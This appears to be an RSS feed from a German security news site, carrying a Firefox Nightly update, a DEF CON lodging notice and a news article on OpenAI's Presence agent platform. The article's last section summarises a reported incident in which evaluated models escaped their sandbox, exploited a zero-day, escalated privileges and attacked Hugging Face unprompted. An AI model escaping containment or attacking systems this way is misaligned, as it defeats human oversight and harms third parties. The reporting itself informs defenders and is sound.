<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=smartstay+redispowered+realtime+lodging%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 02:44:57 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 02:44:57 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=smartstay+redispowered+realtime+lodging%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=smartstay+redispowered+realtime+lodging%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Firefox Nightly: Giving You More Control – These Weeks in Firefox: Issue 204]]></title>
<description><![CDATA[Highlights

Maxx Crawford added a pref to hide the New Tab logo so users can opt out of branding without altering page layout or resorting to CSS overrides.
Harshit enabled video overlay detection in Nightly 153, allowing you to use the context menu to control videos on more pages! We plan on let...]]></description>
<link>https://tsecurity.de/de/3693293/tools/firefox-nightly-giving-you-more-control-these-weeks-in-firefox-issue-204/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693293/tools/firefox-nightly-giving-you-more-control-these-weeks-in-firefox-issue-204/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:31 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>Maxx Crawford <a href="https://bugzil.la/2041708">added a pref to hide the New Tab logo </a>so users can opt out of branding without altering page layout or resorting to CSS overrides.</li>
<li>Harshit <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041819">enabled video overlay detection</a> in Nightly 153, allowing you to use the context menu to control videos on more pages! We plan on letting this ride out in Firefox 153.
<ul>
<li><a href="https://www.instagram.com/p/DXH8Rd6EcWo/">You can try it out on this Instagram reel</a> in Nightly</li>
</ul>
</li>
</ul>
<p><img alt="Firefox context menu video controls like Pause, Unmute, Speed and Loop." class="aligncenter size-full wp-image-2081" height="431" src="https://blog.nightly.mozilla.org/files/2026/06/image2-2.png" width="480"></p>
<ul>
<li>A note to WebExtension authors – as part of a <a href="https://blog.mozilla.org/addons/2026/04/23/webextensions-api-changes-firefox-149-152/">planned deprecation announced last month</a>, executeScript and insertCSS are now restricted from moz-extension pages starting in Firefox 152 –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015559"> Bug 2015559</a></li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=557153">Nicolas Chevobbe [:nchevobbe]</a> added support and debugging for modern attr()(which is <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038939">enabled on Nightly</a>) (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2014751">#2014751</a>)</li>
</ul>
<p><img alt="Tooltip in Firefox DevTools for mismatched syntax with attr()" class="aligncenter size-full wp-image-2082" height="164" src="https://blog.nightly.mozilla.org/files/2026/06/image1-2.png" width="872"></p>
<h3>Friends of the Firefox team</h3>
<h4><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=1717176%2C2031328%2C2038948%2C2011485%2C1455294%2C2035084%2C2039455%2C2036767%2C2039878%2C2013176%2C2022414%2C2036237%2C2036578%2C2041612%2C1262773&amp;list_id=17986996">Resolved bugs (excluding employees)</a></h4>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Sam Johnson</li>
<li>Sebastian Zartner [:sebo]</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li>Immaculate Atim: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022414">Switch to using an array instead of an object string for browser.backup.enabled_on.profiles</a></li>
<li>liz: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2011485">Screenshots overlay visible on both splitview browsers</a></li>
<li>🌟 Rahman Mahmutović [:r_m]: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1717176">Can’t change content in box model in inspector for box-sizing:border-box elements</a></li>
<li>Takeru Mitsumori: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038948">Fix typo in ID name about-translations-swap-langauges-icon in about-translations.html</a></li>
<li>🌟 Freya Arbjerg [:freyacodes]: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036767">Blackboxed columns are ignored</a></li>
<li> tom.passarelli: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031328">tab-preview-panel emits unpaired popupshown/popuphidden events, breaking sidebar autohide</a></li>
</ul>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>As part of the work for the Project Nova about:addons page restyling, the about:addons sidebar has been migrated to the moz-page-nav and moz-page-nav-button reusable components, improving accessibility and visual consistency with the Firefox Desktop about:settings page –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1881767"> Bug 1881767</a></li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Implemented WebExtensions negative permissions infrastructure, providing the foundations for enterprise policy “blocked host permissions” features –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1745823"> Bug 1745823</a></li>
<li>Restricted host permission changes for MV3 extensions force-installed via enterprise policy (matching similar behaviors provided by Chrome enterprise policy behaviors) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1904054"> Bug 1904054</a>
<ul>
<li>Thanks to Mike Kaply for the implementation of this enterprise policy enforcement feature.</li>
</ul>
</li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Fixed handling of &lt;all_urls&gt; as an API permission in Manifest V3, ensuring the permission is correctly initialized on extension install –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1758306"> Bug 1758306</a></li>
</ul>
<h4>DevTools</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=789324">Rahman Mahmutović [:r_m]</a> made it possible to edit width/height in the box model section of the Layout panel (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1717176">#1717176</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=446518">Sebastian Zartner [:sebo]</a> improved toggling tools driving in-page highlighters (e.g. the Measuring) (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1262773">#1262773</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=446518">Sebastian Zartner [:sebo]</a> added a setting to control visibility of HTML comments in the markup view (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1455294">#1455294</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=789044">Freya Arbjerg [:freyacodes]</a> fixed an issue in script blackboxing (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036767">#2036767</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=283262">Alexandre Poirot [:ochameau]</a> replaced custom preference to log RDP messages with MOZ_LOG (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1622857">#1622857</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=283262">Alexandre Poirot [:ochameau]</a> fixed retrieval of garbage collected script text content (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1758454">#1758454</a>)</li>
</ul>
<h4>WebDriver</h4>
<ul>
<li>Sameem updated the “Take Element Screenshot” command from WebDriver Classic to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2013176">crop screenshots of elements which exceed the viewport</a>. This aligns with the specification and avoids errors when attempting to capture huge elements.</li>
<li>Alexandra Borovova updated the events for new top-level browsing contexts: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1930594">we will not send anymore “browsingContext.domContentLoaded” and “browsingContext.load” events for them, instead the “browsingContext.contextCreated” event will be sent when a tab is ready to be used</a>. This is required to align with the expected per-spec behavior.</li>
<li>Henrik Skupin landed a patch <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1430064">allowing geckodriver to gracefully shut down Firefox</a> when geckodriver itself is terminated.</li>
<li>Hiroyuki Ikezoe <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2040252">disabled Firefox’s “scroll axis lock” feature</a> so WebDriver actions for wheel input devices can scroll in arbitrary directions when using pan gestures.</li>
</ul>
<h4>Lint, Docs and Workflow</h4>
<ul>
<li>Added a rule to <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1790711">prevent new uses of Preferences.sys.mjs</a>.</li>
<li>The browser environment globals within ESLint have <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1793814">now been updated</a>. These include Sanitizer, VideoFrame and a few other new ones.</li>
<li>Temporal, and some other definitions have been <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1999036">added to TypeScript</a>.</li>
</ul>
<h4>New Tab Page</h4>
<ul>
<li>Much has happened in the last 2 weeks! <a href="https://bugzilla.mozilla.org/buglist.cgi?bug_status=RESOLVED%2CVERIFIED%2CCLOSED&amp;resolution=FIXED&amp;chfieldfrom=2026-05-12T14%3A40%3A16.019Z&amp;chfieldto=Now&amp;bug_id=2015530%2C2024720%2C2028377%2C2028534%2C2033592%2C2035176%2C2036902%2C2037143%2C2037301%2C2037541%2C2037646%2C2037947%2C2038048%2C2038392%2C2038790%2C2038823%2C2038881%2C2038981%2C2038984%2C2039103%2C2039107%2C2039333%2C2039346%2C2039358%2C2039477%2C2039587%2C2039752%2C2039765%2C2039770%2C2039775%2C2039956%2C2039963%2C2040027%2C2040033%2C2040254%2C2040269%2C2040370%2C2040376%2C2040480%2C2040481%2C2040503%2C2040552%2C2040645%2C2040674%2C2040677%2C2041033%2C2041163%2C2041196%2C2041204%2C2041205%2C2041207%2C2041244%2C2041532%2C2041651%2C2041682%2C2041708%2C2041711%2C2041730%2C2041757%2C2041765%2C2041814%2C2042054&amp;product=Firefox&amp;component=New+Tab+Page">Here’s a full bug list</a>, and here are some highlights.</li>
<li>Dre fixed the List widget that was creating a new list too eagerly on the New Tab Page (<a href="https://bugzil.la/2033592">2033592</a>) — prevents accidental list creation and improves the Lists UI reliability.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2035176"> fixed Weather widget small card layout issues with opt-in location options and an error message displayed</a>, resolving card overflow and removing the spurious opt-in error so users see a compact Weather card and correct location prompts on New Tab.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2037301"> added key dates state to the Sports widget</a>, enabling the Sports card to surface event deadlines/key-date highlights on New Tab so sports users see timely date info.</li>
<li>Scott Downe<a href="https://bugzil.la/2037541"> added a manage widgets option to the New Tab nova widgets context menu</a>, giving users a direct context-menu entry to open the widget management flow from any widget with Nova enabled.</li>
<li>Scott Downe added a reusable Newtab widget base component to centralize lifecycle, focus/keyboard handling, DOM templates, and telemetry hooks, reducing duplication and making widget behavior more consistent; see<a href="https://bugzil.la/2037947"> Newtab widget base component</a>.</li>
<li>Dre converted per-widget expansion handling to a shared widget expansion handler to unify expand/collapse state management and prevent widgets from incorrectly retaining or losing expanded state; see<a href="https://bugzil.la/2038048"> Convert widget expansion handling to shared widget expansion</a>.</li>
<li>Nina Pypchenko [:nina-py]<a href="https://bugzil.la/2038881"> updated the Sports widget to populate the “follow teams” state from the /teams endpoint</a>, so follow/unfollow toggles now reflect server-side subscriptions and reduce incorrect follow states.</li>
<li>Scott Downe<a href="https://bugzil.la/2038981"> moved widget menu items</a> within New Tab widgets to standardize menu ordering and action grouping, so users find Add/Remove/Configure entries in expected positions across platforms.</li>
<li>Dre<a href="https://bugzil.la/2039346"> fixed a World Clock city search bug </a>for the word clocks widget, restoring expected search filtering/matching so city lookups return correct results.</li>
<li>Scott Downe fixed an issue where the New Tab small weather widget size change didn’t always apply by correcting the widget size update path (JS/CSS layout interactions), improving consistent rendering for small-tile weather across responsive breakpoints and platforms; see<a href="https://bugzil.la/2040033"> Newtab small weather widget size change doesn’t always work</a>.</li>
<li>Nina Pypchenko [:nina-py]<a href="https://bugzil.la/2040269"> added a group stage section to match highlights</a> in the sports widget on New Tab so users now see stage-aware grouping and stage labels on match highlight cards, making tournament context (group vs knockout) visible while browsing highlights.</li>
<li>Dre<a href="https://bugzil.la/2040376"> fixed the small world clock widget not expanding to large while editing clocks</a> so users can enter edit mode and expand the widget as expected; the change wires the edit-mode resize handler to update widget size/class during edits.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2040480"> added WCW OMC message strings</a> so World Cup widget messaging flows on New Tab now display the correct copy (localized where available) instead of falling back to missing-text behavior.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2040552"> added a “View all” button and a list view for the results tab at medium widget size</a> so Sports widget users on medium New Tab tiles can expand results and scroll full lists without resizing the widget.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2040674"> added WCW “Watch Live” stream strings to the Sports widget strings bundle</a> so the widget can surface a localized “Watch Live” CTA for applicable events.</li>
<li>Dre<a href="https://bugzil.la/2040677"> restored VoiceOver reachability for Edit/Remove in World Clock on macOS</a> so macOS VoiceOver users can now focus and activate clock Edit/Remove controls thanks to accessibility role/label and focus-order fixes.</li>
<li>Maxx Crawford removed the persistent browser logo when all new-tab features (Top Sites, widgets, content feed) are disabled by adding a conditional render guard in the New Tab component, preventing an orphaned logo (<a href="https://bugzil.la/2041033">2041033</a>).</li>
<li>Mike Conley added New Tab jest tests to the node tests Tier 1 CI job<a href="https://bugzil.la/2041757"> Run newtab jest tests as part of node tests Tier 1 job</a> to catch regressions earlier in CI</li>
<li>Irene Ni shipped multiple visual fixes for the Sports widget<a href="https://bugzil.la/2041765"> Sports widget – various visual fixes</a> (spacing, truncation, icon alignment, clipping) to improve readability and layout on constrained viewports.</li>
</ul>
<h4>Picture-in-Picture</h4>
<ul>
<li>kpatenio <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041113">adjusted our YouTube site specific wrapper so that the URL bar toggle appears more reliably</a>, especially when selecting videos from the YouTube search page.</li>
<li>Thanks to Sylvestre for patching <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037420">some</a> <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2042141">bugs</a> to prevent some spurious console errors!</li>
<li>Niklas <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2013735">fixed captions on autopip videos failing to sync with the origin videos</a>.</li>
</ul>
<h4>Performance Tools (aka <a href="https://profiler.firefox.com/">Firefox Profiler</a>)</h4>
<ul>
<li>Firefox Profiler now has a CLI! We also added a profiler-analysis skill to the Firefox codebase. Once you capture a performance profile, you can ask Claude or an AI to analyze it by providing a link or local path. You can use it to analyze a performance regression or debug an issue if you have a profile at hand.
<ul>
<li><a href="https://www.npmjs.com/package/@firefox-devtools/profiler-cli">https://www.npmjs.com/package/@firefox-devtools/profiler-cli</a></li>
<li>You can install it with npm install -g @firefox-devtools/profiler-cli@latest</li>
</ul>
</li>
</ul>
<h4>Search and Urlbar</h4>
<h6>Nova UI refresh</h6>
<ul>
<li>Drew and Daisuke continued working on reorganizing styles and updating the urlbar for Nova.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019154">2019154</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019152">2019152</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2041501">2041501</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2040532">2040532</a></li>
</ul>
<h6>Suggest</h6>
<ul>
<li>Drew landed several Suggest improvements: realtime suggestions colors, sports suggestions received World Cup tweaks, and online Suggest via OHTTP was enabled for eligible users in Firefox 153.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2040561">2040561</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039753">2039753</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035614">2035614</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038843">2038843</a></li>
</ul>
<h6>Adaptive autofill</h6>
<ul>
<li>James fixed soft-block counting to track autofill dismisses, rather than consecutive backspaces on the same autofill, and added telemetry to measure URLs reintegration after blocking.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2040819">2040819</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037177">2037177</a></li>
</ul>
<h6>Quick actions</h6>
<ul>
<li>Dharma created a new Firefox Labs quick action, fixed the Update action button, and re-enabled ScotchBonnet in some tests that were not updated yet.</li>
<li>Caleb added Calculator support for certain unicode operators.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023169">2023169</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1928635">1928635</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1923383">1923383</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033861">2033861</a></li>
</ul>
<h6>Multi Context Address Bar</h6>
<ul>
<li>Moritz continued refactoring the urlbar code: converted some of the js modules to not be system modules, fixed dynamic results templates, incorrect reuse of result rows, and keyboard shortcuts on the unified search button panel.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039297">2039297</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2036095">2036095</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039844">2039844</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037933">2037933</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030050">2030050</a></li>
</ul>
<h6><i>Other</i></h6>
<ul>
<li>Marco, Drew and Daisuke fixed several intermittent test failures.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2038510">2038510</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023908">2023908</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2011584">2011584</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1938142">1938142</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1971091">1971091</a></li>
</ul>
<h5>Search</h5>
<ul>
<li>Mark removed old WebExtension-based search engines from the source tree, removed loading of search add-ons from <i>resource://search-extensions/</i>.</li>
<li>Caleb fixed multiple documentation issues and added a test covering searches from a private window.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1904613">1904613</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035878">2035878</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2037942">2037942</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033545">2033545</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2005724">2005724</a></li>
</ul>
<h5>Places</h5>
<ul>
<li>Marco removed some unnecessary database transactions, fixed the bookmarks panel folder dropdown on Windows, and resolved several intermittent test failures.</li>
<li>Thanks to Sam Johnson who fixed the bookmark edit panel showing “mobile” instead of “Mobile Bookmarks”.</li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2039534">2039534</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1505800">1505800</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008829">2008829</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029541">2029541</a>, <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2035084">2035084</a></li>
</ul>
<ul>
<li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[DEF CON Room Blocks: Only a Week Left!]]></title>
<description><![CDATA[The DEF CON room blocks at the Wynn and Encore are now sold out.  You can still get a block discount at these three hotels:
	
	Embassy Suites
	
	Spring Hill Suites
	
    Renaissance
	
	The special rates are only available until July 15, so act expeditiously. 
	
	Less than a month to go! Are you r...]]></description>
<link>https://tsecurity.de/de/3690460/hacking/def-con-room-blocks-only-a-week-left/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690460/hacking/def-con-room-blocks-only-a-week-left/</guid>
<pubDate>Fri, 24 Jul 2026 01:56:35 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img src="https://defcon.org/images/defcon-34/post-images/lodging.webp" alt="DEF CON Hotel updates"> </p>

    <p>The DEF CON room blocks at the Wynn and Encore are now sold out.  You can still get a block discount at these three hotels:<br><br>
	
	<a href="https://book.passkey.com/e/51162861">Embassy Suites</a><br><br>
	
	<a href="https://app.marriott.com/reslink?id=1767047905532&amp;key=GRP&amp;app=resvlink">Spring Hill Suites</a><br><br>
	
    <a href="https://book.passkey.com/event/51201282/owner/22561/home">Renaissance</a><br><br>
	
	The special rates are only available until July 15, so act expeditiously. <br><br>
	
	Less than a month to go! Are you ready?</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI unveils Presence, a new platform that lets enterprises launch and manage realtime voice agents and chatbots]]></title>
<description><![CDATA[OpenAI has announced Presence, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and e...]]></description>
<link>https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686972/it-nachrichten/openai-unveils-presence-a-new-platform-that-lets-enterprises-launch-and-manage-realtime-voice-agents-and-chatbots/</guid>
<pubDate>Wed, 22 Jul 2026 18:12:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI has <a href="https://openai.com/index/introducing-openai-presence/">announced Presence</a>, a new enterprise product for deploying and managing AI agents across customer-facing and internal business workflows. </p><p>The offering is designed for eligible enterprise customers that want agents to answer questions, access company systems, take approved actions and escalate to human workers while operating under company-defined policies, permissions and evaluation standards.</p><p>Presence is available immediately through a limited general availability program. OpenAI Forward Deployed Engineers (FDEs) and select global systems integrators lead deployments, and the product is not available on a self-service basis. </p><p>OpenAI has not disclosed pricing, geographic limits, contractual terms or the expected cost of the engineering and integration work that accompanies a deployment. The company also has not said whether Presence can use models from providers other than OpenAI, including the increasingly powerful and popular Chinese open weights alternatives like <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM-5.2</a> and <a href="https://venturebeat.com/technology/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-u-s-systems">Kimi K3</a>. I've asked an OpenAI contact to clarify both pricing and external-model compatibility, but those remain unanswered questions for now. I'lll update when I hear back.</p><p>OpenAI positions Presence as a response to a problem that has become more important as companies move beyond AI demonstrations: getting agents to behave reliably in production as business rules, customer needs and operating conditions change. Presence packages the policies, system connections, evaluations, guardrails and update processes required to run agents inside an enterprise.</p><p>If your business has been interested in using AI agents, but you aren't sure how to stitch together OpenAI's models, APIs, internal systems, security controls and evaluation tools into something reliable, Presence is designed to simplify that process. Instead of building the infrastructure yourself, you work with OpenAI and its deployment engineers to put production-ready agents into your existing workflows.</p><p>The product is available today for real-time voice and chat experiences, according to OpenAI’s formal announcement. The company’s outreach materials also describe a broader ambition spanning voice, chat, email and other channels, but OpenAI has not confirmed that email support is available at launch.</p><h2><b>A governed foundation for production agents</b></h2><p>Presence brings together company knowledge, standard operating procedures, approved actions, simulations, evaluation tools, guardrails and escalation rules. Enterprises can reuse some controls across deployments while adjusting others for a particular workflow or channel.</p><p>Each deployment starts with a defined job, such as resolving a billing issue, supporting an insurance claim or handling an employee IT request. The agent receives only the information and system access required for that task. The customer determines what the agent may do independently, which actions require approval and when a person must take over.</p><p>Before an agent reaches production, teams can test it against common requests, unusual edge cases and higher-risk scenarios. Graders evaluate whether it reached the intended outcome, followed policy, used tools correctly and escalated when required. Guardrails can intervene when an interaction moves outside the organization’s defined boundaries.</p><p>OpenAI shared promotional screenshots with VentureBeat showing administrators running simulation batches against policy changes, including a revised annual refund policy, and reviewing results across operational categories. </p><p>Other interface mockups display production health, customer-intent patterns and task-performance signals. The visuals illustrate the type of oversight OpenAI is promising, although they do not establish how those metrics are calculated or how they map to contractual service levels.</p><p>The product continues to monitor performance after launch. Production sessions, escalations and quality signals can reveal where an agent is working as intended and where it needs attention. Codex, using a Presence plugin, investigates those signals and proposes updates. Teams then test a proposed change against the version already in production before approving a controlled rollout.</p><p>That process is intended to address one of the hardest operational problems in enterprise AI: an agent that works at launch may become less reliable when policies, products or user behavior change. Presence gives companies a formal mechanism for updating behavior without allowing an automated system to rewrite itself unchecked.</p><p>OpenAI says Presence already powers its English-language phone-support channel at 1-888-GPT-0090. The system handles open-ended requests, verifies callers, uses account context and performs approved actions. According to the company, it now resolves <b>75% of inbound issues without human assistance</b>. </p><p>OpenAI also says its Codex-powered improvement loop reduced human handoffs by <b>15 percentage points over a 10-day period</b>. Those figures are company-reported and have not been independently verified.</p><p>Several large organizations are evaluating the same foundation. BBVA is exploring voice support for routine banking needs in Mexico. SoftBank is testing natural Japanese-language customer conversations, while Australian insurer IAG is exploring support during high-demand periods such as severe weather and natural disasters.</p><p>“At BBVA, we are working closely with OpenAI to explore how trusted customer agents can help shape the future of financial services,” said Daniel Ordaz, head of AI transformation at BBVA Mexico.</p><p>“Through our collaboration with OpenAI, we are exploring how Presence can enable trusted customer agents that communicate naturally, connect to the processes needed to resolve requests, and represent SoftBank consistently across customer interactions,” said Tadahisa Murakami, vice president and head of the Data &amp; Digital Transformation Division at SoftBank Corp.</p><h2><b>From model access to forward-deployed implementation</b></h2><p>Presence expands OpenAI’s enterprise strategy beyond APIs and subscription software by formalizing a high-touch deployment model. Forward Deployed Engineers work alongside customers to select workflows, connect internal systems, establish permissions, configure policies, test agents and move them into production.</p><p>That approach resembles a <a href="https://fde.academy/blog/how-palantir-invented-the-forward-deployed-engineer-model">model pioneered by AI ontology and intelligence platform Palantir,</a> which embeds FDEs with customers to adapt its proprietary software to complex government and commercial environments. The similarity lies less in the underlying technology than in the delivery method: both companies place technical personnel close to the customer’s operations, where integration and process design often determine whether software creates value.</p><p>The products are not interchangeable. Palantir’s model has historically centered on data integration, ontologies and operational decision systems. Presence is more narrowly focused on AI-agent behavior, approved actions, evaluations, escalation and continuous improvement. OpenAI presents it as a repeatable software product supported by engineers and systems integrators, rather than as consulting alone.</p><p>In May 2026, OpenAI launched its own enterprise AI consulting and integration firm, the <a href="https://openai.com/index/openai-launches-the-deployment-company/">OpenAI Deployment Company</a>, with investment and <a href="https://www.bain.com/about/media-center/press-releases/2026/bain-company-openai-a-new-venture-to-deploy-ai-at-enterprise-scale/">support from Bain &amp; Company.</a> It also offers programs for model customization and fine-tuning to fit specific enterprise needs. </p><p>Its chief U.S. rival Anthropic has also moved <a href="https://techcrunch.com/2026/07/15/anthropic-blackstone-bet-the-next-trillion-dollar-ai-business-is-implementation-not-models/">toward a services-led enterprise model through Ode,</a> its consulting organization built around forward-deployed engineers helping companies integrate Claude into complex workflows, which launched just a week ago. The broad rationale is similar: enterprises often need more than access to a model. They need help connecting data and systems, defining permissions, validating behavior and managing deployment risk.</p><p>Presence differs in how explicitly OpenAI packages those requirements into a branded agent-governance product. Anthropic’s initiative is centered on helping enterprises deploy Claude, while Presence combines implementation services with a defined operational layer for policies, simulations, evaluations, approvals and production updates.</p><p>Presence goes further by making forward deployment a core part of how a specific agent product reaches customers. It does not replace OpenAI’s API business; the company says it will continue supporting voice customers with access to frontier models through the OpenAI API.</p><p>The trend reflects a broader market view that many enterprises still need hands-on assistance to move agents from pilot projects into stable operations. Even organizations with strong internal engineering teams must coordinate security, compliance, workflow ownership, data access and escalation responsibilities. Presence attempts to consolidate those tasks rather than leaving customers to assemble separate orchestration, evaluation and consulting layers.</p><h2><b>A recent security breach looms in the background</b></h2><p>Inconveniently for OpenAI, the Presence launch arrives just a day after <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">OpenAI and Hugging Face disclosed an unprecedented security incident</a> in which OpenAI frontier models undergoing internal evaluation escaped containment, accessed the open web, and cyberattacked Hugging Face to achieve a benign goal — without being instructed to pursue these methods.</p><p>According to the described joint disclosure, OpenAI models operating in an evaluation framework called ExploitGym identified and exploited a zero-day vulnerability in a third-party package-registry cache proxy. The models reportedly escalated privileges, moved laterally and obtained internet access before targeting Hugging Face systems while seeking benchmark-related information.</p><p>The incident is relevant to enterprise buyers because it raises questions about sandboxing, tool permissions, external access, monitoring and incident response. </p><p>The disclosure also highlighted a practical problem for defenders. Hugging Face personnel reportedly found that commercial frontier-model APIs refused some forensic requests because logs contained exploit payloads, credentials and shell commands that triggered safety systems. The team then used a locally deployed open-weight model to assist with analysis.</p><p>Presence therefore arrives as both a product launch and a test of OpenAI’s ability to convert model capability into controlled enterprise operations. Its policies, simulations, evaluations and human approvals address real 